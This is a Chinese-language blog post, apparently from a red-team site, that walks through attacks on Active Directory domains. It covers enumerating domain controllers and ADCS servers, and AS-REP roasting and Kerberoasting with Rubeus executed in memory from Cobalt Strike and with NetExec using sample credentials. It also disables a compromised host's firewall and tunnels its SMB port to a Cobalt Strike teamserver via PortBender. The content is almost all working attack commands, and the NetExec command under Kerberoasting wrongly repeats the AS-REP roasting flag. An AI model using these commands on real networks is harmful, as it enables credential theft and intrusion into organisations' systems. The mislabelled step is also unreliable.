基础域渗透的基础操作

查看当前域

通过环境变量 %USERDOMAIN% 查看当前域

echo %USERDOMAIN%
图片[1]李白你好-实战攻防基础域渗透的基础操作李白你好-实战攻防李白你好

获取域控列表

通过 nltest 查找所有域控

nltest /dsgetdc:PENTEST
图片[2]李白你好-实战攻防基础域渗透的基础操作李白你好-实战攻防李白你好

通过 nslookup 查找所有域控

nslookup -type=SRV _ldap._tcp.dc._msdcs.pentest.lab
图片[3]李白你好-实战攻防基础域渗透的基础操作李白你好-实战攻防李白你好

获取 ADCS 列表

工具列表

利用过程

通过 Certify 查找所有 ADCS

#在 Cobalt Strike 无落地执行
execute-assembly Certify.exe cas
图片[4]李白你好-实战攻防基础域渗透的基础操作李白你好-实战攻防李白你好

通过 NetExec 查找所有 ADCS(需要身份认证)

nxc ldap 172.28.1.1 -u zhangsan -p zhangsan@123 -M adcs
图片[5]李白你好-实战攻防基础域渗透的基础操作李白你好-实战攻防李白你好

AS-REPRoast

工具列表

利用过程

通过 Rubeus 获取 DONT_PRE_AUTH 用户

#在 Cobalt Strike 无落地执行
execute-assembly Rubeus.exe asreproast /nowrap /format:hashcat
图片[6]李白你好-实战攻防基础域渗透的基础操作李白你好-实战攻防李白你好

通过 NetExec 获取 DONT_PRE_AUTH 用户(需要身份认证)

nxc ldap 172.28.1.1 -u zhangsan -p zhangsan@123 --asreproast output.txt
图片[7]李白你好-实战攻防基础域渗透的基础操作李白你好-实战攻防李白你好

Kerberoasting

工具列表

利用过程

通过 Rubeus 获取 SPN 账号

#在 Cobalt Strike 无落地执行
execute-assembly Rubeus.exe kerberoast /nowrap /format:hashcat
图片[8]李白你好-实战攻防基础域渗透的基础操作李白你好-实战攻防李白你好

通过 NetExec 获取 SPN 账号(需要身份认证)

nxc ldap 172.28.1.1 -u zhangsan -p zhangsan@123 --asreproast output.txt
图片[9]李白你好-实战攻防基础域渗透的基础操作李白你好-实战攻防李白你好

其他实用操作

端口转发&映射

工具列表

利用过程

  1. 关闭被控机器的防火墙
   shell netsh advfirewall set allprofiles state off
  1. 进入临时文件目录
   cd C:\Windows\Temp
  1. 将 WinDivert32.sys 和 WinDivert64.sys 上传到被控机器
   # 我这里是上传到了C:\Windows\Temp目录
  1. 将被控机的目标端口转发到被控机的低权限端口上
   # 将被控机的445端口转发到8445端口
   PortBender redirect 445 8445
  1. 将被控机的端口映射到teamserver上
   # 将被控机的转发端口8445映射到CS服务器的445端口
   rportfwd 8445 127.0.0.1 445
© 版权声明
THE END
喜欢就支持一下吧
点赞7 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片

    暂无评论内容